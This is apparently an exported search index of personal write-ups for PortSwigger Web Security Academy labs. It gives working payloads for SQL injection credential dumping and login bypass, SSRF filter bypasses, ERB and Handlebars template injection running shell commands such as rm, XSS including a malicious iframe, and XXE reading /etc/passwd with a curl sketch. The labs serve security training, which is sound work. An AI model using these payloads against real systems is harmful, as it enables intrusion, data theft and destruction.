        This lab contains an\u00a0SQL injection\u00a0vulnerability in the product category filter. When the user selects a category, the application carries out an SQL query like the following:

        SELECT * FROM products WHERE category = 'Gifts' AND released = 1

        To solve the lab, perform an SQL injection attack that causes the application to display details of all products in any category, both released and unreleased.

        ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#solution","title":"Solution","text":"

        Filter by one of the categories and, in the URL, replace that category after the \"=\" with:

        ' OR '1'='1\n
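
        For reference, PortSwigger's canonical payload for this lab also comments out the released filter, so that unreleased products are returned as well:

        ' OR 1=1--\n

        which turns the back-end query into:

        SELECT * FROM products WHERE category = '' OR 1=1--' AND released = 1\n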
        ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#sql-injection-vulnerability-allowing-login-bypass","title":"SQL injection vulnerability allowing login bypass","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#enuntiation_1","title":"Enuntiation","text":"

        This lab contains an\u00a0SQL injection\u00a0vulnerability in the login function.

        To solve the lab, perform an SQL injection attack that logs in to the application as the\u00a0administrator\u00a0user.

        ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#solution_1","title":"Solution","text":"

        On the login page, enter the following as the username:

        administrator'--\n

        For the password, it doesn't matter what you write.
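
        With that username, the back-end query becomes something like the following, the -- commenting out the password check:

        SELECT * FROM users WHERE username = 'administrator'--' AND password = ''\n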

        ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#sql-injection-union-attack-determining-the-number-of-columns-returned-by-the-query","title":"SQL injection UNION attack, determining the number of columns returned by the query","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#enuntiation_2","title":"Enuntiation","text":"

        This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. The first step of such an attack is to determine the number of columns that are being returned by the query. You will then use this technique in subsequent labs to construct the full attack.

        To solve the lab, determine the number of columns returned by the query by performing an\u00a0SQL injection UNION\u00a0attack that returns an additional row containing null values.

        ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#solution_2","title":"Solution","text":"

        In the category filter, filter by 'Gifts'. Then, in the URL, substitute Gifts with:

        ' OR '1'='1' order by 1-- -\n' OR '1'='1' order by 2-- -\n' OR '1'='1' order by 3-- -\n' OR '1'='1' order by 4-- -\n

        When substituting with the last string (order by 4), you will get an error. Bingo! Our last successful try was order by 3, so the query returns 3 columns. Now we can launch our UNION attack:

        ' OR '1'='1' UNION SELECT all  null,null,null-- -\n

        ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#sql-injection-union-attack-finding-a-column-containing-text","title":"SQL injection UNION attack, finding a column containing text","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#enuntiation_3","title":"Enuntiation","text":"

        This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you first need to determine the number of columns returned by the query. You can do this using a technique you learned in a\u00a0previous lab. The next step is to identify a column that is compatible with string data.

        The lab will provide a random value that you need to make appear within the query results. To solve the lab, perform an\u00a0SQL injection UNION\u00a0attack that returns an additional row containing the value provided. This technique helps you determine which columns are compatible with string data.

        ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#solution_3","title":"Solution","text":"

        Select the 'Gifts' category filter on the lab's home page.

        In the URL, substitute Gifts with the following string to work out which column is being displayed:

        ' UNION SELECT null,null,null-- -\n

        The lab environment displays, at the top of the screen, a string of characters that you need to get reflected in order to pass the lab. In my case it was the string 'FEvLOw'. I tried that string in different positions and succeeded in the second one:

        '+UNION+SELECT+'FEvLOw',NULL,NULL--\n'+UNION+SELECT+NULL,'FEvLOw',NULL--\n

        ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#sql-injection-union-attack-retrieving-data-from-other-tables","title":"SQL injection UNION attack, retrieving data from other tables","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#enuntiation_4","title":"Enuntiation","text":"

        This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you need to combine some of the techniques you learned in previous labs.

        The database contains a different table called\u00a0users, with columns called\u00a0username\u00a0and\u00a0password.

        To solve the lab, perform an\u00a0SQL injection UNION\u00a0attack that retrieves all usernames and passwords, and use the information to log in as the\u00a0administrator\u00a0user.

        ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#solution_4","title":"Solution","text":"

        First, we test the number of columns and we obtain 2.
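
        A quick way to confirm the count (two NULLs succeed, a third produces an error):

        ' UNION SELECT NULL,NULL-- -\n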

        Then we run:

        ' UNION SELECT ALL username,password FROM users-- -\n

        ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#sql-injection-union-attack-retrieving-multiple-values-in-a-single-column","title":"SQL injection UNION attack, retrieving multiple values in a single column","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#enuntiation_5","title":"Enuntiation","text":"

        This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response so you can use a UNION attack to retrieve data from other tables.

        The database contains a different table called\u00a0users, with columns called\u00a0username\u00a0and\u00a0password.

        To solve the lab, perform an\u00a0SQL injection UNION\u00a0attack that retrieves all usernames and passwords, and use the information to log in as the\u00a0administrator\u00a0user.

        ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#solution_5","title":"Solution","text":"

        As in the previous lab, we first test how many columns there are:

        ' UNION SELECT ALL NULL,NULL-- -\n

        After that, we find that (in my case) the reflected column is the second one, and we use it to retrieve the usernames and then the passwords:

        ' UNION SELECT NULL,username FROM users-- -\n

        And we get:

        carlos\nadministrator\nwiener\n

        And then, passwords:

        ' UNION SELECT NULL,password FROM users-- -\n

        And we get:
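
        Alternatively, both values can be retrieved in one query by concatenating them into the single reflected column; PortSwigger's solution uses a '~' separator:

        ' UNION SELECT NULL,username||'~'||password FROM users-- -\n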

        ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#sql-injection-attack-querying-the-database-type-and-version-on-oracle","title":"SQL injection attack, querying the database type and version on Oracle","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#enuntiation_6","title":"Enuntiation","text":"

        This lab contains a\u00a0SQL injection\u00a0vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.

        To solve the lab, display the database version string.

        ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#solution_6","title":"Solution","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-ssrf/","title":"BurpSuite Labs - Server Side Request Forgery","text":"

        https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery#payloads-with-localhost

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#basic-ssrf-against-the-local-server","title":"Basic SSRF against the local server","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#enunciation","title":"Enunciation","text":"

        This lab has a stock check feature which fetches data from an internal system.

        To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#solution","title":"Solution","text":"
        POST /product/stock HTTP/2\nHost: 0a1600f6034ecb0581760c6200e30093.web-security-academy.net\nCookie: session=nQDGMiUWrUCVsa4ZXP4RoToYgd4biWt5\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: https://0a1600f6034ecb0581760c6200e30093.web-security-academy.net/product?productId=1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 64\nOrigin: https://0a1600f6034ecb0581760c6200e30093.web-security-academy.net\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\n\nstockApi=http%3A%2F%2Flocalhost%2Fadmin%2Fdelete?username=carlos\n
        1. Browse to /admin and observe that you can't directly access the admin page.
        2. Visit a product, click \"Check stock\", intercept the request in Burp Suite, and send it to Burp Repeater.
        3. Change the URL in the stockApi parameter to http://localhost/admin. This should display the administration interface.
        4. Read the HTML to identify the URL to delete the target user, which is:

          http://localhost/admin/delete?username=carlos

        5. Submit this URL in the stockApi parameter to deliver the SSRF attack.

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#basic-ssrf-against-another-back-end-system","title":"Basic SSRF against another back-end system","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#enunciation_1","title":"Enunciation","text":"

        This lab has a stock check feature which fetches data from an internal system.

        To solve the lab, use the stock check functionality to scan the internal 192.168.0.X range for an admin interface on port 8080, then use it to delete the user carlos.

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#solution_1","title":"Solution","text":"

        Launch a scan request with Burp Intruder, marking the final octet of the IP address as the payload position:

        POST /product/stock HTTP/2\nHost: 0a81003a04cbb66585aa2164005e00d9.web-security-academy.net\nCookie: session=ukVLJOQMDp5wqxujhaw2c21t5Xt8XcYq\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: https://0a81003a04cbb66585aa2164005e00d9.web-security-academy.net/product?productId=2\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 96\nOrigin: https://0a81003a04cbb66585aa2164005e00d9.web-security-academy.net\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\n\nstockApi=http://192.168.0.\u00a71\u00a7:8080/admin/\n

        The single 200 response tells us that the admin interface is at http://192.168.0.16:8080/admin/, so we can send the delete request for user carlos.

        POST /product/stock HTTP/2\nHost: 0a81003a04cbb66585aa2164005e00d9.web-security-academy.net\nCookie: session=ukVLJOQMDp5wqxujhaw2c21t5Xt8XcYq\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: https://0a81003a04cbb66585aa2164005e00d9.web-security-academy.net/product?productId=2\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 62\nOrigin: https://0a81003a04cbb66585aa2164005e00d9.web-security-academy.net\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\n\nstockApi=http://192.168.0.16:8080/admin/delete?username=carlos\n

        1. Visit a product, click \"Check stock\", intercept the request in Burp Suite, and send it to Burp Intruder.
        2. Click \"Clear \u00a7\", change the stockApi parameter to http://192.168.0.1:8080/admin then highlight the final octet of the IP address (the number 1), click \"Add \u00a7\".
        3. Switch to the Payloads tab, change the payload type to Numbers, and enter 1, 255, and 1 in the \"From\" and \"To\" and \"Step\" boxes respectively.
        4. Click \"Start attack\".
        5. Click on the \"Status\" column to sort it by status code ascending. You should see a single entry with a status of 200, showing an admin interface.
        6. Click on this request, send it to Burp Repeater, and change the path in the stockApi to: /admin/delete?username=carlos
        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#ssrf-with-blacklist-based-input-filters","title":"SSRF with blacklist-based input filters","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#enunciation_2","title":"Enunciation","text":"

        This lab has a stock check feature which fetches data from an internal system.

        To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.

        The developer has deployed two weak anti-SSRF defenses that you will need to bypass.

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#solution_2","title":"Solution","text":"
        POST /product/stock HTTP/2\nHost: 0a7700f4041232118111d52d000100ab.web-security-academy.net\nCookie: session=zdzvJtvkFadrRM96wa1vXhMF7G2zfSkN\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: https://0a7700f4041232118111d52d000100ab.web-security-academy.net/product?productId=1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 66\nOrigin: https://0a7700f4041232118111d52d000100ab.web-security-academy.net\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\n\nstockApi=http://127.1/%25%36%31dmin\n

        Now we know the two filter bypasses we need:

        • 127.1 instead of the blocked 127.0.0.1
        • double URL-encoding of the \"a\" character in the word 'admin' (see the worked encoding chain after the steps below)

        With these, we can send the delete request for user carlos.

        POST /product/stock HTTP/2\nHost: 0a7700f4041232118111d52d000100ab.web-security-academy.net\nCookie: session=zdzvJtvkFadrRM96wa1vXhMF7G2zfSkN\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: https://0a7700f4041232118111d52d000100ab.web-security-academy.net/product?productId=1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 66\nOrigin: https://0a7700f4041232118111d52d000100ab.web-security-academy.net\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\n\nstockApi=http://127.1/%25%36%31dmin/%25%36%34elete?username=carlos\n

        1. Visit a product, click \"Check stock\", intercept the request in Burp Suite, and send it to Burp Repeater.
        2. Change the URL in the stockApi parameter to http://127.0.0.1/ and observe that the request is blocked.
        3. Bypass the block by changing the URL to: http://127.1/
        4. Change the URL to http://127.1/admin and observe that the URL is blocked again.
        5. Obfuscate the \"a\" by double-URL encoding it to %2561 to access the admin interface and delete the target user.
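
        For clarity, the double URL-encoding is ordinary percent-encoding applied twice; nothing here is lab-specific:

        a -> %61 (encode once)\n%61 -> %2561 (encode the % itself)\nadmin -> %2561dmin\ndelete -> %2564elete\n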
        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#ssrf-with-filter-bypass-via-open-redirection-vulnerability","title":"SSRF with filter bypass via open redirection vulnerability","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#enunciation_3","title":"Enunciation","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#solution_3","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssti/","title":"BurpSuite Labs - Server Side Template Injection","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#basic-server-side-template-injection","title":"Basic server-side template injection","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#enunciation","title":"Enunciation","text":"

        This lab is vulnerable to server-side template injection due to the unsafe construction of an ERB template.

        To solve the lab, review the ERB documentation to find out how to execute arbitrary code, then delete the morale.txt file from Carlos's home directory.

        ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#solution","title":"Solution","text":"

        Identify an injection point.

        Test a template injection. From the enunciation we know the engine is ERB.

        Beforehand, we run a whoami to confirm code execution.

        Then we list the root directory \"/\".

        And finally \"/home/carlos\".
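
        A sketch of typical ERB payloads for those steps (standard ERB syntax; where exactly they are injected depends on the parameter you identified):

        <%= 7*7 %>\n<%= system(\"whoami\") %>\n<%= Dir.entries(\"/\") %>\n<%= Dir.entries(\"/home/carlos\") %>\n<%= File.delete(\"/home/carlos/morale.txt\") %>\n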

        ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#basic-server-side-template-injection-code-context","title":"Basic server-side template injection (code context)","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#enunciation_1","title":"Enunciation","text":"

        This lab is vulnerable to server-side template injection due to the way it unsafely uses a Tornado template. To solve the lab, review the Tornado documentation to discover how to execute arbitrary code, then delete the\u00a0morale.txt\u00a0file from Carlos's home directory.

        You can log in to your own account using the following credentials:\u00a0wiener:peter

        ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#solution_1","title":"Solution","text":"

        Afterwards, you need to visit the endpoint where the code gets executed.

        ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#server-side-template-injection-using-documentation","title":"Server-side template injection using documentation","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#enunciation_2","title":"Enunciation","text":"

        This lab is vulnerable to server-side template injection. To solve the lab, identify the template engine and use the documentation to work out how to execute arbitrary code, then delete the\u00a0morale.txt\u00a0file from Carlos's home directory.

        You can log in to your own account using the following credentials:

        content-manager:C0nt3ntM4n4g3r

        ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#solution_2","title":"Solution","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#server-side-template-injection-in-an-unknown-language-with-a-documented-exploit","title":"Server-side template injection in an unknown language with a documented exploit","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#enunciation_3","title":"Enunciation","text":"

        This lab is vulnerable to server-side template injection. To solve the lab, identify the template engine and find a documented exploit online that you can use to execute arbitrary code, then delete the\u00a0morale.txt\u00a0file from Carlos's home directory.

        ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#solution_3","title":"Solution","text":"

        Find the injection point and identify the template engine from the stack traces:

        Search the web for \"Handlebars server-side template injection\". You should find a well-known exploit posted by\u00a0@Zombiehelp54.

        URL-encode this payload to solve the lab:

        {{#with \"s\" as |string|}}\n    {{#with \"e\"}}\n        {{#with split as |conslist|}}\n            {{this.pop}}\n            {{this.push (lookup string.sub \"constructor\")}}\n            {{this.pop}}\n            {{#with string.split as |codelist|}}\n                {{this.pop}}\n                {{this.push \"return require('child_process').exec('rm /home/carlos/morale.txt');\"}}\n                {{this.pop}}\n                {{#each conslist}}\n                    {{#with (string.sub.apply 0 codelist)}}\n                        {{this}}\n                    {{/with}}\n                {{/each}}\n            {{/with}}\n        {{/with}}\n    {{/with}}\n{{/with}}  \n
        ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#server-side-template-injection-with-information-disclosure-via-user-supplied-objects","title":"Server-side template injection with information disclosure via user-supplied objects","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#enunciation_4","title":"Enunciation","text":"

        This lab is vulnerable to server-side template injection due to the way an object is being passed into the template. This vulnerability can be exploited to access sensitive data.

        To solve the lab, steal and submit the framework's secret key.

        You can log in to your own account using the following credentials:

        content-manager:C0nt3ntM4n4g3r

        ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#solution_4","title":"Solution","text":"

        See the Django documentation on the SECRET_KEY setting: https://docs.djangoproject.com/en/5.0/ref/settings/#secret-key
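
        A sketch of the usual approach, assuming the engine turns out to be the Django template language: {% debug %} dumps the template context (which includes the settings object), after which the key can be read directly:

        {% debug %}\n{{ settings.SECRET_KEY }}\n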

        ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#server-side-template-injection-in-a-sandboxed-environment","title":"Server-side template injection in a sandboxed environment","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#enunciation_5","title":"Enunciation","text":"

        This lab uses the Freemarker template engine. It is vulnerable to server-side template injection due to its poorly implemented sandbox. To solve the lab, break out of the sandbox to read the file\u00a0my_password.txt\u00a0from Carlos's home directory. Then submit the contents of the file.

        You can log in to your own account using the following credentials:

        content-manager:C0nt3ntM4n4g3r

        ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#solution_5","title":"Solution","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#server-side-template-injection-with-a-custom-exploit","title":"Server-side template injection with a custom exploit","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#enunciation_6","title":"Enunciation","text":"

        This lab is vulnerable to server-side template injection. To solve the lab, create a custom exploit to delete the file\u00a0/.ssh/id_rsa\u00a0from Carlos's home directory.

        You can log in to your own account using the following credentials:\u00a0wiener:peter

        ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#warning","title":"Warning","text":"

        As with many high-severity vulnerabilities, experimenting with server-side template injection can be dangerous. If you're not careful when invoking methods, it is possible to damage your instance of the lab, which could make it unsolvable. If this happens, you will need to wait 20 minutes until your lab session resets.

        ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#solution_6","title":"Solution","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#server-side-template-injection-with-a-custom-exploit_1","title":"Server-side template injection with a custom exploit","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#enunciation_7","title":"Enunciation","text":"

        This lab is vulnerable to server-side template injection. To solve the lab, create a custom exploit to delete the file\u00a0/.ssh/id_rsa\u00a0from Carlos's home directory.

        You can log in to your own account using the following credentials:\u00a0wiener:peter

        Warning

        As with many high-severity vulnerabilities, experimenting with server-side template injection can be dangerous. If you're not careful when invoking methods, it is possible to damage your instance of the lab, which could make it unsolvable. If this happens, you will need to wait 20 minutes until your lab session resets.

        ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#solution_7","title":"Solution","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-xss/","title":"BurpSuite Labs - Cross-site Scripting","text":"","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#reflected-xss-into-html-context-with-nothing-encoded","title":"Reflected XSS into HTML context with nothing encoded","text":"","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#enuntiation","title":"Enuntiation","text":"

        This lab contains a simple\u00a0reflected cross-site scripting\u00a0vulnerability in the search functionality.

        To solve the lab, perform a cross-site scripting attack that calls the\u00a0alert\u00a0function.

        ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#solution","title":"Solution","text":"

        Copy and paste the following into the search box:

        <script>alert(1)</script>\n

        Click Search.

        ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#stored-xss-into-html-context-with-nothing-encoded","title":"Stored XSS into HTML context with nothing encoded","text":"","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#enuntiation_1","title":"Enuntiation","text":"

        This lab contains a\u00a0stored cross-site scripting\u00a0vulnerability in the comment functionality.

        To solve this lab, submit a comment that calls the\u00a0alert\u00a0function when the blog post is viewed.

        ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#solution_1","title":"Solution","text":"

        Go to a post, and in the comment box enter:

        <script>alert(1)</script>\n

        Once you go back to the post, the script will be loaded.

        ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#dom-xss-in-documentwrite-sink-using-source","title":"DOM XSS in\u00a0document.write\u00a0sink using source","text":"","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#enuntiation_2","title":"Enuntiation","text":"

        This lab contains a\u00a0DOM-based cross-site scripting\u00a0vulnerability in the search query tracking functionality. It uses the JavaScript\u00a0document.write\u00a0function, which writes data out to the page. The\u00a0document.write\u00a0function is called with data from\u00a0location.search, which you can control using the website URL.

        To solve this lab, perform a\u00a0cross-site scripting\u00a0attack that calls the\u00a0alert\u00a0function.

        ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#solution_2","title":"Solution","text":"

        Use the search box to look for some alphanumeric characters and see where in the response they are reflected. In this case, it was inside an image tag:
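
        The reflection point looks roughly like this (path and parameter name illustrative), which is why the payload must first break out of the src attribute and the tag:

        <img src=\"/resources/images/tracker.gif?searchTerms=YOURTEXT\">\n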

        Now, escape those characters. For instance with:

        \"><SCRIPT>alert(1)</sCripT>\n
        ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#dom-xss-in-innerhtml-sink-using-source","title":"DOM XSS in\u00a0innerHTML\u00a0sink using source","text":"","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#enuntiation_3","title":"Enuntiation","text":"

        This lab contains a\u00a0DOM-based cross-site scripting\u00a0vulnerability in the search blog functionality. It uses an\u00a0innerHTML\u00a0assignment, which changes the HTML contents of a\u00a0div\u00a0element, using data from\u00a0location.search.

        To solve this lab, perform a\u00a0cross-site scripting\u00a0attack that calls the\u00a0alert\u00a0function.

        ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#solution_3","title":"Solution","text":"

        Reviewing my notes: when looking for a DOM-based XSS, a good proof-of-concept source is swisskyrepo/PayloadsAllTheThings.

        An extensive XSS payload list is available from Payloadbox, but it's hard to tell which entries are true positives; for this lab you will end up with a list of 124 possible payloads.

        To solve the lab, enter the following in the search box:

        #\"><img src=/ onerror=alert(2)>\n

        ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#dom-xss-in-jquery-anchor-href-attribute-sink-using-locationsearch-source","title":"DOM XSS in jQuery anchor\u00a0href\u00a0attribute sink using\u00a0location.search\u00a0source","text":"","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#enuntiation_4","title":"Enuntiation","text":"

        This lab contains a\u00a0DOM-based cross-site scripting\u00a0vulnerability in the submit feedback page. It uses the jQuery library's\u00a0$\u00a0selector function to find an anchor element, and changes its\u00a0href\u00a0attribute using data from\u00a0location.search.

        To solve this lab, make the \"back\" link alert\u00a0document.cookie.

        ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#solution_4","title":"Solution","text":"

        On the home page, pay attention to the \"Submit feedback\" link; it points to /feedback?returnpath=/.

        Edit the source code and append javascript:alert(document.cookie) to the returnpath parameter so that the final href attribute is:

        /feedback?returnpath=/javascript:alert(document.cookie)\n

        Click on Submit feedback.

        ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#dom-xss-in-jquery-selector-sink-using-a-hashchange-event","title":"DOM XSS in jQuery selector sink using a hashchange event","text":"","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#enuntiation_5","title":"Enuntiation","text":"

        This lab contains a\u00a0DOM-based cross-site scripting\u00a0vulnerability on the home page. It uses jQuery's\u00a0$()\u00a0selector function to auto-scroll to a given post, whose title is passed via the\u00a0location.hash\u00a0property.

        To solve the lab, deliver an exploit to the victim that calls the\u00a0print()\u00a0function in their browser.

        ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#solution_5","title":"Solution","text":"

        Copied from the Burp Suite solution:

        1. Notice the vulnerable code on the home page using Burp or the browser's DevTools.
        2. From the lab banner, open the exploit server.
        3. In the\u00a0Body\u00a0section, add the following malicious\u00a0iframe:

          <iframe src=\"https://YOUR-LAB-ID.web-security-academy.net/#\" onload=\"this.src+='<img src=x onerror=print()>'\"></iframe>\n

        4. Store the exploit, then click View exploit to confirm that the print() function is called.
        5. Go back to the exploit server and click Deliver to victim to solve the lab.

        ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xxe/","title":"BurpSuite Labs - XML External Entity XXE","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#exploiting-xxe-using-external-entities-to-retrieve-files","title":"Exploiting XXE using external entities to retrieve files","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation","title":"Enunciation","text":"

        This lab has a \"Check stock\" feature that parses XML input and returns any unexpected values in the response.

        To solve the lab, inject an XML external entity to retrieve the contents of the /etc/passwd file.

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution","title":"Solution","text":"
        # Burpsuite solution\n\n1. Visit a product page, click \"Check stock\", and intercept the resulting POST request in Burp Suite.\n2. Insert the following external entity definition in between the XML declaration and the `stockCheck` element:\n\n    `<!DOCTYPE test [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]>`\n3. Replace the `productId` number with a reference to the external entity: `&xxe;`. The response should contain \"Invalid product ID:\" followed by the contents of the `/etc/passwd` file.\n
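
        The same attack can be reproduced outside the proxy; a minimal curl sketch, where the lab hostname, the /product/stock endpoint path and the XML body shape are assumptions taken from the lab:

        # Hedged sketch: send the XXE payload directly (URL, endpoint and body shape are assumptions)\ncurl -s 'https://YOUR-LAB-ID.web-security-academy.net/product/stock' -H 'Content-Type: application/xml' --data '<?xml version=\"1.0\"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]><stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>'\n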
        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#exploiting-xxe-to-perform-ssrf-attacks","title":"Exploiting XXE to perform SSRF attacks","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation_1","title":"Enunciation","text":"

        This lab has a \"Check stock\" feature that parses XML input and returns any unexpected values in the response.

        The lab server is running a (simulated) EC2 metadata endpoint at the default URL, which is http://169.254.169.254/. This endpoint can be used to retrieve data about the instance, some of which might be sensitive.

        To solve the lab, exploit the XXE vulnerability to perform an SSRF attack that obtains the server's IAM secret access key from the EC2 metadata endpoint.

